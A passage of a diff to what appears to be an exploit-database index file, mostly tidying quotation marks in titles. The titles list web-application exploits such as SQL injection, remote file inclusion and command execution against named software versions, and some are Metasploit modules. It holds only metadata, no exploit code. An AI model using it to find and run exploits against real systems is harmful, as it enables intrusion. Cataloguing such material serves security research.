Exploit",2003-12-21,RusH,php,webapps,0 +137,platforms/php/webapps/137.pl,"phpBB 2.0.6 - 'search_id' SQL Injection MD5 Hash Remote Exploit",2003-12-21,RusH,php,webapps,0 138,platforms/php/webapps/138.pl,"PHP-Nuke 6.9 - 'cid' SQL Injection Remote Exploit",2003-12-21,RusH,php,webapps,0 177,platforms/cgi/webapps/177.pl,"Poll It CGI 2.0 - Exploit",2000-11-15,keelis,cgi,webapps,0 179,platforms/cgi/webapps/179.c,"News Update 1.1 - Change Admin Password",2000-11-15,morpheus[bd],cgi,webapps,0 @@ -16689,7 +16691,7 @@ id,file,description,date,author,platform,type,port 1039,platforms/cgi/webapps/1039.pl,"Webhints 1.03 - Remote Command Execution (Perl) (1)",2005-06-11,Alpha_Programmer,cgi,webapps,0 1040,platforms/cgi/webapps/1040.c,"Webhints 1.03 - Remote Command Execution (C) (2)",2005-06-11,Alpha_Programmer,cgi,webapps,0 1041,platforms/cgi/webapps/1041.pl,"Webhints 1.03 - Remote Command Execution (Perl) (3)",2005-06-11,MadSheep,cgi,webapps,0 -1048,platforms/cgi/webapps/1048.pl,"eXtropia Shopping Cart - web_store.cgi Remote Exploit",2005-06-15,"Action Spider",cgi,webapps,0 +1048,platforms/cgi/webapps/1048.pl,"eXtropia Shopping Cart - 'web_store.cgi' Remote Exploit",2005-06-15,"Action Spider",cgi,webapps,0 1049,platforms/php/webapps/1049.php,"Mambo 4.5.2.1 - Fetch Password Hash Remote Exploit",2005-06-15,pokleyzz,php,webapps,0 1050,platforms/php/webapps/1050.pl,"PHP Arena 1.1.3 - 'pafiledb.php' Remote Change Password Exploit",2005-06-15,Alpha_Programmer,php,webapps,0 1051,platforms/php/webapps/1051.pl,"Ultimate PHP Board 1.9.6 GOLD - users.dat Password Decryptor",2005-06-16,"Alberto Trivero",php,webapps,0 @@ -16781,7 +16783,7 @@ id,file,description,date,author,platform,type,port 1364,platforms/php/webapps/1364.c,"SugarSuite Open Source 4.0beta - Remote Code Execution (2)",2005-12-08,pointslash,php,webapps,0 1367,platforms/php/webapps/1367.php,"Flatnuke 2.5.6 - Privilege Escalation / Remote Commands Execution",2005-12-10,rgod,php,webapps,0 1370,platforms/php/webapps/1370.php,"phpCOIN 1.2.2 - 'phpcoinsessid' SQL Injection / Remote Code Execution",2005-12-12,rgod,php,webapps,0 -1373,platforms/php/webapps/1373.php,"Limbo 1.0.4.2 - _SERVER[REMOTE_ADDR] Overwrite Remote Exploit",2005-12-14,rgod,php,webapps,0 +1373,platforms/php/webapps/1373.php,"Limbo 1.0.4.2 - '_SERVER[REMOTE_ADDR]' Overwrite Remote Exploit",2005-12-14,rgod,php,webapps,0 1379,platforms/php/webapps/1379.php,"PHPGedView 3.3.7 - Remote Code Execution",2005-12-20,rgod,php,webapps,0 1382,platforms/php/webapps/1382.pl,"phpBB 2.0.18 - Remote Brute Force/Dictionary (2)",2006-02-20,DarkFig,php,webapps,0 1383,platforms/php/webapps/1383.txt,"phpBB 2.0.18 - Cross-Site Scripting / Cookie Disclosure",2005-12-21,jet,php,webapps,0 @@ -16879,7 +16881,7 @@ id,file,description,date,author,platform,type,port 1608,platforms/php/webapps/1608.php,"WebAlbum 2.02pl - COOKIE[skin2] Remote Code Execution",2006-03-25,rgod,php,webapps,0 1609,platforms/php/webapps/1609.pl,"PHP Ticket 0.71 - 'search.php' SQL Injection",2006-03-25,undefined1_,php,webapps,0 1610,platforms/php/webapps/1610.txt,"phpBookingCalendar 1.0c - 'details_view.php' SQL Injection",2006-03-25,undefined1_,php,webapps,0 -1611,platforms/php/webapps/1611.pl,"TFT Gallery 0.10 - Password Disclosure Remote Exploit",2006-03-25,undefined1_,php,webapps,0 +1611,platforms/php/webapps/1611.pl,"TFT Gallery 0.10 - Password Disclosure",2006-03-25,undefined1_,php,webapps,0 1612,platforms/php/webapps/1612.php,"CuteNews 1.4.1 - 'function.php' Local File Inclusion",2006-03-26,"Hamid Ebadi",php,webapps,0 1616,platforms/php/webapps/1616.pl,"Aztek Forum 4.0 - 'myadmin.php' User Privilege Escalation",2006-03-26,Sparah,php,webapps,0 1617,platforms/php/webapps/1617.php,"PHPCollab 2.x / NetOffice 2.x - 'sendpassword.php' SQL Injection",2006-03-28,rgod,php,webapps,0 @@ -16991,13 +16993,13 @@ id,file,description,date,author,platform,type,port 1808,platforms/php/webapps/1808.txt,"phpMyDirectory 10.4.4 - 'ROOT_PATH' Remote File Inclusion",2006-05-19,OLiBekaS,php,webapps,0 1809,platforms/php/webapps/1809.txt,"CaLogic Calendars 1.2.2 - 'CLPath' Remote File Inclusion",2006-05-20,Kacper,php,webapps,0 1810,platforms/php/webapps/1810.pl,"Woltlab Burning Board 2.3.5 - 'links.php' SQL Injection",2006-05-20,666,php,webapps,0 -1811,platforms/php/webapps/1811.php,"XOOPS 2.0.13.2 - xoopsOption[nocommon] Remote Exploit",2006-05-21,rgod,php,webapps,0 +1811,platforms/php/webapps/1811.php,"XOOPS 2.0.13.2 - 'xoopsOption[nocommon]' Remote Exploit",2006-05-21,rgod,php,webapps,0 1812,platforms/php/webapps/1812.pl,"Fusion News 1.0 (fil_config) - Remote File Inclusion",2006-05-21,X0r_1,php,webapps,0 1814,platforms/php/webapps/1814.txt,"UBBCentral UBB.Threads 6.4.x < 6.5.2 - 'thispath' Remote File Inclusion",2006-05-22,V4mu,php,webapps,0 1816,platforms/php/webapps/1816.php,"Nucleus CMS 3.22 - 'DIR_LIBS' Remote File Inclusion",2006-05-23,rgod,php,webapps,0 1817,platforms/php/webapps/1817.txt,"Docebo 3.0.3 - Multiple Remote File Inclusions",2006-05-23,Kacper,php,webapps,0 1818,platforms/php/webapps/1818.txt,"phpCommunityCalendar 4.0.3 - Multiple (Cross-Site Scripting / SQL Injection) Vulnerabilities",2006-05-23,X0r_1,php,webapps,0 -1821,platforms/php/webapps/1821.php,"Drupal 4.7 - attachment mod_mime Remote Exploit",2006-05-24,rgod,php,webapps,0 +1821,platforms/php/webapps/1821.php,"Drupal 4.7 - 'Attachment mod_mime' Remote Exploit",2006-05-24,rgod,php,webapps,0 1823,platforms/php/webapps/1823.txt,"BASE 1.2.4 - melissa (Snort Frontend) Remote File Inclusion",2006-05-25,str0ke,php,webapps,0 1824,platforms/php/webapps/1824.txt,"open-medium.CMS 0.25 - '404.php' Remote File Inclusion",2006-05-25,Kacper,php,webapps,0 1825,platforms/php/webapps/1825.txt,"Back-End CMS 0.7.2.2 - 'BE_config.php' Remote File Inclusion",2006-05-25,Kacper,php,webapps,0 @@ -17765,7 +17767,7 @@ id,file,description,date,author,platform,type,port 2841,platforms/php/webapps/2841.php,"Woltlab Burning Board Lite 1.0.2 - 'decode_cookie()' SQL Injection",2006-11-24,rgod,php,webapps,0 2842,platforms/php/webapps/2842.php,"Woltlab Burning Board Lite 1.0.2 - Blind SQL Injection",2006-11-23,rgod,php,webapps,0 2843,platforms/php/webapps/2843.pl,"PHP-Nuke NukeAI Module 3b - 'util.php' Remote File Inclusion",2006-11-24,DeltahackingTEAM,php,webapps,0 -2844,platforms/php/webapps/2844.pl,"Cahier de texte 2.0 - Database Backup/Source Disclosure Remote Exploit",2006-11-24,DarkFig,php,webapps,0 +2844,platforms/php/webapps/2844.pl,"Cahier de texte 2.0 - Database Backup / Source Disclosure",2006-11-24,DarkFig,php,webapps,0 2846,platforms/asp/webapps/2846.txt,"Liberum Help Desk 0.97.3 - SQL Injection",2006-11-25,ajann,asp,webapps,0 2847,platforms/php/webapps/2847.txt,"Sisfo Kampus 0.8 - Remote File Inclusion / Download",2006-11-25,"Wawan Firmansyah",php,webapps,0 2848,platforms/asp/webapps/2848.txt,"Basic Forum 1.1 - 'edit.asp' SQL Injection",2006-11-25,bolivar,asp,webapps,0 @@ -20496,7 +20498,7 @@ id,file,description,date,author,platform,type,port 6809,platforms/php/webapps/6809.txt,"Joomla! Component ionFiles 4.4.2 - File Disclosure",2008-10-22,Vrs-hCk,php,webapps,0 6810,platforms/asp/webapps/6810.txt,"DorsaCMS - 'ShowPage.aspx' SQL Injection",2008-10-22,syst3m_f4ult,asp,webapps,0 6811,platforms/php/webapps/6811.txt,"YDC - 'cat' SQL Injection",2008-10-22,"Hussin X",php,webapps,0 -6814,platforms/php/webapps/6814.php,"CSPartner 1.0 - Delete All Users / SQL Injection Remote Exploit",2008-10-23,StAkeR,php,webapps,0 +6814,platforms/php/webapps/6814.php,"CSPartner 1.0 - Delete All Users / SQL Injection",2008-10-23,StAkeR,php,webapps,0 6816,platforms/php/webapps/6816.txt,"txtshop 1.0b (Windows) - 'Language' Local File Inclusion",2008-10-23,Pepelux,php,webapps,0 6817,platforms/php/webapps/6817.txt,"Joomla! Component RWCards 3.0.11 - Local File Inclusion",2008-10-23,Vrs-hCk,php,webapps,0 6818,platforms/php/webapps/6818.txt,"aflog 1.01 - Multiple Insecure Cookie Handling Vulnerabilities",2008-10-23,JosS,php,webapps,0 @@ -21887,7 +21889,7 @@ id,file,description,date,author,platform,type,port 8860,platforms/php/webapps/8860.txt,"Podcast Generator 1.2 - 'GLOBALS[]' Multiple Vulnerabilities",2009-06-02,StAkeR,php,webapps,0 8864,platforms/php/webapps/8864.txt,"My Mini Bill - 'orderid' SQL Injection",2009-06-03,"ThE g0bL!N",php,webapps,0 8865,platforms/php/webapps/8865.txt,"EgyPlus 7ml 1.0.1 - Authentication Bypass",2009-06-03,Qabandi,php,webapps,0 -8866,platforms/php/webapps/8866.php,"Podcast Generator 1.2 - Unauthorized Re-Installation Remote Exploit",2009-06-03,StAkeR,php,webapps,0 +8866,platforms/php/webapps/8866.php,"Podcast Generator 1.2 - Unauthorized Re-Installation",2009-06-03,StAkeR,php,webapps,0 8867,platforms/php/webapps/8867.pl,"Joomla! Component Seminar 1.28 - 'id' Blind SQL Injection",2009-06-03,"ThE g0bL!N",php,webapps,0 8868,platforms/php/webapps/8868.txt,"OCS Inventory NG 1.02 - Remote File Disclosure",2009-06-03,"Nico Leidecker",php,webapps,0 8869,platforms/php/webapps/8869.txt,"Supernews 2.6 - 'index.php?noticia' SQL Injection",2009-06-03,DD3str0y3r,php,webapps,0 @@ -22244,7 +22246,7 @@ id,file,description,date,author,platform,type,port 9444,platforms/php/webapps/9444.txt,"PHP-Lance 1.52 - Multiple Local File Inclusions",2009-08-18,jetli007,php,webapps,0 9445,platforms/php/webapps/9445.py,"BaBB 2.8 - Remote Code Injection",2009-08-18,"Khashayar Fereidani",php,webapps,0 9447,platforms/php/webapps/9447.pl,"AJ Auction Pro OOPD 2.x - 'id' SQL Injection",2009-08-18,NoGe,php,webapps,0 -9448,platforms/php/webapps/9448.py,"SPIP < 2.0.9 - Arbitrary Copy All Passwords to .XML File Remote Exploit",2009-08-18,Kernel_Panik,php,webapps,0 +9448,platforms/php/webapps/9448.py,"SPIP < 2.0.9 - Arbitrary Copy All Passwords to '.XML' File",2009-08-18,Kernel_Panik,php,webapps,0 9450,platforms/php/webapps/9450.txt,"vTiger CRM 5.0.4 - Remote Code Execution / Cross-Site Request Forgery / Local File Inclusion / Cross-Site Scripting",2009-08-18,USH,php,webapps,0 9451,platforms/php/webapps/9451.txt,"DreamPics Builder - 'exhibition_id' SQL Injection",2009-08-18,Mr.SQL,php,webapps,0 9452,platforms/php/webapps/9452.pl,"Arcadem Pro 2.8 - 'article' Blind SQL Injection",2009-08-18,Mr.SQL,php,webapps,0 @@ -22410,7 +22412,7 @@ id,file,description,date,author,platform,type,port 9855,platforms/php/webapps/9855.txt,"Geeklog 1.6.0sr2 - Arbitrary File Upload",2009-10-03,JaL0h,php,webapps,0 9856,platforms/asp/webapps/9856.txt,"Snitz Forums 2000 - Cross-Site Scripting Multiple Vulnerabilities",2009-10-15,"Andrea Fabrizi",asp,webapps,0 9857,platforms/asp/webapps/9857.txt,"AfterLogic WebMail Pro 4.7.10 - Cross-Site Scripting",2009-10-05,"Sébastien Duquette",asp,webapps,0 -9861,platforms/unix/webapps/9861.rb,"Nagios3 - statuswml.cgi Command Injection (Metasploit)",2009-10-30,"H D Moore",unix,webapps,0 +9861,platforms/unix/webapps/9861.rb,"Nagios3 - 'statuswml.cgi' Command Injection (Metasploit)",2009-10-30,"H D Moore",unix,webapps,0 9863,platforms/php/webapps/9863.txt,"Achievo 1.3.4 - Cross-Site Scripting",2009-10-14,"Ryan Dewhurst",php,webapps,0 9867,platforms/php/webapps/9867.txt,"Amiro.CMS 5.4.0.0 - Path Disclosure",2009-10-19,"Vladimir Vorontsov",php,webapps,0 9872,platforms/multiple/webapps/9872.txt,"boxalino 09.05.25-0421 - Directory Traversal",2009-10-20,"Axel Neumann",multiple,webapps,0 @@ -25302,7 +25304,7 @@ id,file,description,date,author,platform,type,port 16886,platforms/cgi/webapps/16886.rb,"AWStats 6.4 < 6.5 - migrate Remote Command Execution (Metasploit)",2010-07-03,Metasploit,cgi,webapps,0 16889,platforms/linux/webapps/16889.rb,"Redmine SCM Repository 0.9.x/1.0.x - Arbitrary Command Execution (Metasploit)",2011-01-08,Metasploit,linux,webapps,0 16890,platforms/php/webapps/16890.rb,"phpBB - 'viewtopic.php' Arbitrary Code Execution (Metasploit)",2010-07-03,Metasploit,php,webapps,0 -16891,platforms/cgi/webapps/16891.rb,"QuickTime Streaming Server - parse_xml.cgi Remote Execution (Metasploit)",2010-07-03,Metasploit,cgi,webapps,0 +16891,platforms/cgi/webapps/16891.rb,"QuickTime Streaming Server - 'parse_xml.cgi' Remote Execution (Metasploit)",2010-07-03,Metasploit,cgi,webapps,0 16892,platforms/php/webapps/16892.rb,"TWiki History TWikiUsers - 'rev' Command Execution (Metasploit)",2010-07-03,Metasploit,php,webapps,0 16893,platforms/cgi/webapps/16893.rb,"Barracuda - IMG.pl Remote Command Execution (Metasploit)",2010-04-30,Metasploit,cgi,webapps,0 16894,platforms/php/webapps/16894.rb,"TWiki - Search Function Arbitrary Command Execution (Metasploit)",2010-07-03,Metasploit,php,webapps,0 @@ -25316,7 +25318,7 @@ id,file,description,date,author,platform,type,port 16905,platforms/cgi/webapps/16905.rb,"AWStats 6.1 < 6.2 - configdir Remote Command Execution (Metasploit)",2009-12-26,Metasploit,cgi,webapps,0 16906,platforms/php/webapps/16906.rb,"Joomla! Plugin tinybrowser 1.5.12 - Arbitrary File Upload / Code Execution (Metasploit)",2010-06-15,Metasploit,php,webapps,0 16907,platforms/hardware/webapps/16907.rb,"Google Appliance ProxyStyleSheet - Command Execution (Metasploit)",2010-07-01,Metasploit,hardware,webapps,0 -16908,platforms/cgi/webapps/16908.rb,"Nagios3 - statuswml.cgi Ping Command Execution (Metasploit)",2010-07-14,Metasploit,cgi,webapps,0 +16908,platforms/cgi/webapps/16908.rb,"Nagios3 - 'statuswml.cgi' 'Ping' Command Execution (Metasploit)",2010-07-14,Metasploit,cgi,webapps,0 16909,platforms/php/webapps/16909.rb,"Coppermine Photo Gallery 1.4.14 - 'picEditor.php' Command Execution (Metasploit)",2010-07-03,Metasploit,php,webapps,0 16911,platforms/php/webapps/16911.rb,"TikiWiki tiki-graph_formula - PHP Remote Code Execution (Metasploit)",2010-09-20,Metasploit,php,webapps,0 16912,platforms/php/webapps/16912.rb,"Mambo - Cache_Lite Class MosConfig_absolute_path Remote File Inclusion (Metasploit)",2010-11-24,Metasploit,php,webapps,0 @@ -26424,7 +26426,7 @@ id,file,description,date,author,platform,type,port 20669,platforms/php/webapps/20669.py,"GWebmail 0.7.3 - Cross-Site Scripting / Local File Inclusion / Remote Code Execution",2012-08-20,"Shai rod",php,webapps,0 20709,platforms/php/webapps/20709.html,"OpenDocMan 1.2.6.1 - Cross-Site Request Forgery (Password Change)",2012-08-22,"Shai rod",php,webapps,0 20710,platforms/php/webapps/20710.html,"VamCart 0.9 - Cross-Site Request Forgery",2012-08-22,DaOne,php,webapps,0 -20712,platforms/cgi/webapps/20712.rb,"E-Mail Security Virtual Appliance - learn-msg.cgi Command Injection (Metasploit)",2012-08-22,Metasploit,cgi,webapps,0 +20712,platforms/cgi/webapps/20712.rb,"E-Mail Security Virtual Appliance - 'learn-msg.cgi' Command Injection (Metasploit)",2012-08-22,Metasploit,cgi,webapps,0 20671,platforms/php/webapps/20671.html,"PG Portal Pro - Cross-Site Request Forgery",2012-08-20,Noxious,php,webapps,0 20672,platforms/php/webapps/20672.py,"Hivemail Webmail - Persistent Cross-Site Scripting Multiple Vulnerabilities",2012-08-20,"Shai rod",php,webapps,0 20673,platforms/php/webapps/20673.txt,"YourArcadeScript 2.4 - 'index.php?id' SQL Injection",2012-08-20,DaOne,php,webapps,0 @@ -26512,7 +26514,7 @@ id,file,description,date,author,platform,type,port 21241,platforms/php/webapps/21241.txt,"WikkiTikkiTavi 0.x - Remote File Inclusion",2002-01-02,"Scott Moonen",php,webapps,0 21250,platforms/php/webapps/21250.txt,"Webify Blog - Arbitrary File Deletion",2012-09-11,JIKO,php,webapps,0 21251,platforms/php/webapps/21251.txt,"akcms 4.2.4 - Information Disclosure",2012-09-11,L0n3ly-H34rT,php,webapps,0 -21257,platforms/cgi/webapps/21257.txt,"AHG Search Engine 1.0 - search.cgi Arbitrary Command Execution",2002-01-29,"Aleksey Sintsov",cgi,webapps,0 +21257,platforms/cgi/webapps/21257.txt,"AHG Search Engine 1.0 - 'search.cgi' Arbitrary Command Execution",2002-01-29,"Aleksey Sintsov",cgi,webapps,0 21267,platforms/php/webapps/21267.txt,"Subrion CMS 2.2.1 - Cross-Site Request Forgery (Add Admin)",2012-09-12,LiquidWorm,php,webapps,0 21269,platforms/php/webapps/21269.txt,"Webify eDownloads Cart - Arbitrary File Deletion",2012-09-12,JIKO,php,webapps,0 21270,platforms/php/webapps/21270.txt,"Webify Business Directory - Arbitrary File Deletion",2012-09-12,JIKO,php,webapps,0 @@ -26593,8 +26595,8 @@ id,file,description,date,author,platform,type,port 21486,platforms/php/webapps/21486.txt,"PHPBB2 - Image Tag HTML Injection",2002-05-26,"Martijn Boerwinkel",php,webapps,0 21487,platforms/cgi/webapps/21487.pl,"Image Display System 0.8.1 - Directory Existence Disclosure",2002-05-28,isox,cgi,webapps,0 21493,platforms/cfm/webapps/21493.txt,"Gafware CFXImage 1.6.4/1.6.6 - ShowTemp File Disclosure",2002-05-29,"Richard Brain",cfm,webapps,0 -21494,platforms/cgi/webapps/21494.txt,"CGIScript.net - csPassword.cgi 1.0 Information Disclosure",2002-05-30,"Steve Gustin",cgi,webapps,0 -21495,platforms/cgi/webapps/21495.txt,"CGIScript.net - csPassword.cgi 1.0 HTAccess File Modification",2002-05-30,"Steve Gustin",cgi,webapps,0 +21494,platforms/cgi/webapps/21494.txt,"CGIScript.net - 'csPassword.cgi' 1.0 Information Disclosure",2002-05-30,"Steve Gustin",cgi,webapps,0 +21495,platforms/cgi/webapps/21495.txt,"CGIScript.net - 'csPassword.cgi' 1.0 HTAccess File Modification",2002-05-30,"Steve Gustin",cgi,webapps,0 21509,platforms/php/webapps/21509.txt,"Teekai Tracking Online 1.0 - Cross-Site Scripting",2002-06-03,frog,php,webapps,0 21514,platforms/php/webapps/21514.txt,"Splatt Forum 3.0 - Image Tag HTML Injection",2002-06-06,MegaHz,php,webapps,0 21517,platforms/php/webapps/21517.txt,"Voxel Dot Net CBms 0.x - Multiple Code Injection Vulnerabilities",2002-06-06,"Ulf Harnhammar",php,webapps,0 @@ -26725,7 +26727,7 @@ id,file,description,date,author,platform,type,port 21960,platforms/php/webapps/21960.txt,"gBook 1.4 - Administrative Access",2002-10-22,frog,php,webapps,0 21961,platforms/php/webapps/21961.txt,"MyMarket 1.71 - 'Form_Header.php' Cross-Site Scripting",2002-10-23,qber66,php,webapps,0 21962,platforms/cgi/webapps/21962.txt,"Mojo Mail 2.7 - Email Form Cross-Site Scripting",2002-10-24,"Daniel Boland",cgi,webapps,0 -21966,platforms/cgi/webapps/21966.txt,"MailReader.com 2.3.x - NPH-MR.cgi File Disclosure",2002-10-28,pokleyzz,cgi,webapps,0 +21966,platforms/cgi/webapps/21966.txt,"MailReader.com 2.3.x - 'NPH-MR.cgi' File Disclosure",2002-10-28,pokleyzz,cgi,webapps,0 21967,platforms/php/webapps/21967.txt,"Benjamin Lefevre Dobermann Forum 0.x - 'entete.php?subpath' Remote File Inclusion",2002-10-28,frog,php,webapps,0 21968,platforms/php/webapps/21968.txt,"Benjamin Lefevre Dobermann Forum 0.x - 'enteteacceuil.php?subpath' Remote File Inclusion",2002-10-28,frog,php,webapps,0 21969,platforms/php/webapps/21969.txt,"Benjamin Lefevre Dobermann Forum 0.x - 'index.php?subpath' Remote File Inclusion",2002-10-28,frog,php,webapps,0 @@ -26756,7 +26758,7 @@ id,file,description,date,author,platform,type,port 22047,platforms/php/webapps/22047.txt,"FreeNews 2.1 - Include Undefined Variable Command Execution",2002-11-26,frog,php,webapps,0 22048,platforms/php/webapps/22048.txt,"News Evolution 1.0/2.0 - Include Undefined Variable Command Execution",2002-11-26,frog,php,webapps,0 22050,platforms/cgi/webapps/22050.txt,"BizDesign ImageFolio 2.x/3.0.1 - 'imageFolio.cgi?direct' Cross-Site Scripting",2002-11-27,SecurityTracker.com,cgi,webapps,0 -22051,platforms/cgi/webapps/22051.txt,"BizDesign ImageFolio 2.x/3.0.1 - nph-build.cgi Cross-Site Scripting",2002-11-27,SecurityTracker.com,cgi,webapps,0 +22051,platforms/cgi/webapps/22051.txt,"BizDesign ImageFolio 2.x/3.0.1 - 'nph-build.cgi' Cross-Site Scripting",2002-11-27,SecurityTracker.com,cgi,webapps,0 22052,platforms/cgi/webapps/22052.txt,"YaBB 1 Gold - SP 1 YaBB.pl Cross-Site Scripting",2002-11-28,"Fabricio Angeletti",cgi,webapps,0 22065,platforms/php/webapps/22065.html,"phpBB 2.0.3 - 'search.php' Cross-Site Scripting",2002-12-03,f_a_a,php,webapps,0 22070,platforms/windows/webapps/22070.py,"OTRS 3.1 - Persistent Cross-Site Scripting",2012-10-18,"Mike Eduard",windows,webapps,0 @@ -26840,10 +26842,10 @@ id,file,description,date,author,platform,type,port 22254,platforms/php/webapps/22254.txt,"DotBr 0.1 - 'Exec.php3' Remote Command Execution",2003-02-15,frog,php,webapps,0 22256,platforms/php/webapps/22256.txt,"D-Forum 1 - 'header' Remote File Inclusion",2003-02-18,frog,php,webapps,0 22257,platforms/php/webapps/22257.txt,"D-Forum 1 - 'footer' Remote File Inclusion",2003-02-18,frog,php,webapps,0 -22260,platforms/cgi/webapps/22260.c,"cPanel 5.0 - Guestbook.cgi Remote Command Execution (1)",2003-02-19,bob,cgi,webapps,0 -22261,platforms/cgi/webapps/22261.pl,"cPanel 5.0 - Guestbook.cgi Remote Command Execution (2)",2003-02-19,CaMaLeoN,cgi,webapps,0 -22262,platforms/cgi/webapps/22262.pl,"cPanel 5.0 - Guestbook.cgi Remote Command Execution (3)",2003-02-19,SPAX,cgi,webapps,0 -22263,platforms/cgi/webapps/22263.pl,"cPanel 5.0 - Guestbook.cgi Remote Command Execution (4)",2003-02-19,pokleyzz,cgi,webapps,0 +22260,platforms/cgi/webapps/22260.c,"cPanel 5.0 - 'Guestbook.cgi' Remote Command Execution (1)",2003-02-19,bob,cgi,webapps,0 +22261,platforms/cgi/webapps/22261.pl,"cPanel 5.0 - 'Guestbook.cgi' Remote Command Execution (2)",2003-02-19,CaMaLeoN,cgi,webapps,0 +22262,platforms/cgi/webapps/22262.pl,"cPanel 5.0 - 'Guestbook.cgi' Remote Command Execution (3)",2003-02-19,SPAX,cgi,webapps,0 +22263,platforms/cgi/webapps/22263.pl,"cPanel 5.0 - 'Guestbook.cgi' Remote Command Execution (4)",2003-02-19,pokleyzz,cgi,webapps,0 22266,platforms/php/webapps/22266.php,"PHP-Nuke 5.6/6.0 - Search Engine SQL Injection",2003-02-19,"David Zentner",php,webapps,0 22267,platforms/php/webapps/22267.php,"PHPBB2 - 'Page_Header.php' SQL Injection",2003-02-19,"David Zentner",php,webapps,0 22268,platforms/php/webapps/22268.txt,"myPHPNuke 1.8.8 - 'links.php' Cross-Site Scripting",2003-02-20,"Tacettin Karadeniz",php,webapps,0 @@ -26941,7 +26943,7 @@ id,file,description,date,author,platform,type,port 22517,platforms/php/webapps/22517.txt,"OpenBB 1.0/1.1 - 'index.php' SQL Injection",2003-04-22,"Albert Puigsech Galicia",php,webapps,0 22519,platforms/php/webapps/22519.txt,"OpenBB 1.0/1.1 - 'board.php' SQL Injection",2003-04-22,"Albert Puigsech Galicia",php,webapps,0 22520,platforms/php/webapps/22520.txt,"OpenBB 1.0/1.1 - 'member.php' SQL Injection",2003-04-22,"Albert Puigsech Galicia",php,webapps,0 -22571,platforms/cgi/webapps/22571.pl,"HappyMall E-Commerce Software 4.3/4.4 - Normal_HTML.cgi Command Execution",2003-05-07,"Revin Aldi",cgi,webapps,0 +22571,platforms/cgi/webapps/22571.pl,"HappyMall E-Commerce Software 4.3/4.4 - 'Normal_HTML.cgi' Command Execution",2003-05-07,"Revin Aldi",cgi,webapps,0 22524,platforms/php/webapps/22524.txt,"ZenPhoto 1.4.3.3 - Multiple Vulnerabilities",2012-11-06,waraxe,php,webapps,0 22529,platforms/asp/webapps/22529.txt,"Battleaxe Software BTTLXE Forum - 'login.asp' SQL Injection",2003-04-23,Du|L,asp,webapps,0 22534,platforms/php/webapps/22534.txt,"Truegalerie 1.0 - Unauthorized Administrative Access",2003-04-25,frog,php,webapps,0 @@ -26957,15 +26959,15 @@ id,file,description,date,author,platform,type,port 22557,platforms/php/webapps/22557.txt,"PHP-Nuke Splatt Forum 4.0 Module - Cross-Site Scripting",2003-05-01,"Morning Wood",php,webapps,0 22558,platforms/php/webapps/22558.txt,"PHP-Nuke Splatt Forum 4.0 Module - HTML Injection",2003-05-01,"Morning Wood",php,webapps,0 22559,platforms/cgi/webapps/22559.pl,"Stockman Shopping Cart 7.8 - Arbitrary Command Execution",2003-05-01,"Aleksey Sintsov",cgi,webapps,0 -22572,platforms/cgi/webapps/22572.pl,"HappyMall E-Commerce Software 4.3/4.4 - Member_HTML.cgi Command Execution",2003-05-08,"Revin Aldi",cgi,webapps,0 +22572,platforms/cgi/webapps/22572.pl,"HappyMall E-Commerce Software 4.3/4.4 - 'Member_HTML.cgi' Command Execution",2003-05-08,"Revin Aldi",cgi,webapps,0 22577,platforms/php/webapps/22577.txt,"ttCMS 2.2 / ttForum 1.1 - 'news.php?template' Remote File Inclusion",2003-05-09,"Charles Reinold",php,webapps,0 22578,platforms/php/webapps/22578.txt,"ttCMS 2.2 / ttForum 1.1 - 'install.php?installdir' Remote File Inclusion",2003-05-09,"Charles Reinold",php,webapps,0 22579,platforms/php/webapps/22579.txt,"Phorum 3.4.x - 'Message Form' HTML Injection",2003-05-09,WiciU,php,webapps,0 22583,platforms/asp/webapps/22583.pl,"Snitz Forums 2000 - 'register.asp' SQL Injection",2003-05-10,sharpiemarker,asp,webapps,0 -22588,platforms/cgi/webapps/22588.txt,"Happymall E-Commerce Software 4.3/4.4 - Normal_HTML.cgi Cross-Site Scripting",2003-05-12,"Julio Cesar",cgi,webapps,0 +22588,platforms/cgi/webapps/22588.txt,"Happymall E-Commerce Software 4.3/4.4 - 'Normal_HTML.cgi' Cross-Site Scripting",2003-05-12,"Julio Cesar",cgi,webapps,0 22589,platforms/php/webapps/22589.txt,"PHP-Nuke 5.x/6.x Web_Links Module - SQL Injection",2003-05-12,"Albert Puigsech Galicia",php,webapps,0 22590,platforms/php/webapps/22590.txt,"NetOffice Dwins 1.4p3 - SQL Injection",2012-11-09,dun,php,webapps,0 -22592,platforms/cgi/webapps/22592.txt,"Happymall E-Commerce Software 4.3/4.4 - Normal_HTML.cgi File Disclosure",2003-05-12,"Julio Cesar",cgi,webapps,0 +22592,platforms/cgi/webapps/22592.txt,"Happymall E-Commerce Software 4.3/4.4 - 'Normal_HTML.cgi' File Disclosure",2003-05-12,"Julio Cesar",cgi,webapps,0 22595,platforms/php/webapps/22595.txt,"PHP-Nuke 6.5 - 'modules.php?Username' Cross-Site Scripting",2003-05-13,"Ferruh Mavituna",php,webapps,0 22597,platforms/php/webapps/22597.txt,"PHP-Nuke 6.5 (Multiple Downloads Module) - SQL Injection",2003-05-13,"Albert Puigsech Galicia",php,webapps,0 22598,platforms/php/webapps/22598.txt,"PHP-Nuke 6.0/6.5 Web_Links Module - Full Path Disclosure",2003-05-13,"Rynho Zeros Web",php,webapps,0 @@ -26995,7 +26997,7 @@ id,file,description,date,author,platform,type,port 22687,platforms/php/webapps/22687.pl,"Webfroot Shoutbox 2.32 - Remote Command Execution",2003-05-29,pokleyzz,php,webapps,0 22688,platforms/cgi/webapps/22688.txt,"M-TECH P-Synch 6.2.5 - 'nph-psf.exe?css' Remote File Inclusion",2003-05-29,JeiAr,cgi,webapps,0 22689,platforms/cgi/webapps/22689.txt,"M-TECH P-Synch 6.2.5 - 'nph-psa.exe?css' Remote File Inclusion",2003-05-29,JeiAr,cgi,webapps,0 -22692,platforms/cgi/webapps/22692.txt,"Zeus Web Server 4.x - Admin Interface VS_Diag.cgi Cross-Site Scripting",2003-05-29,"Hugo Vazquez",cgi,webapps,0 +22692,platforms/cgi/webapps/22692.txt,"Zeus Web Server 4.x - Admin Interface 'VS_Diag.cgi' Cross-Site Scripting",2003-05-29,"Hugo Vazquez",cgi,webapps,0 22693,platforms/php/webapps/22693.txt,"cPanel 5/6 / Formail-Clone - E-Mail Restriction Bypass",2003-05-30,"Chad C. Keep",php,webapps,0 22697,platforms/asp/webapps/22697.asp,"iisCart2000 - Arbitrary File Upload",2003-05-31,Bosen,asp,webapps,0 22698,platforms/asp/webapps/22698.pl,"WebCortex WebStores2000 - SQL Injection",2003-05-31,Bosen,asp,webapps,0 @@ -27019,7 +27021,7 @@ id,file,description,date,author,platform,type,port 22736,platforms/php/webapps/22736.txt,"Friends in War 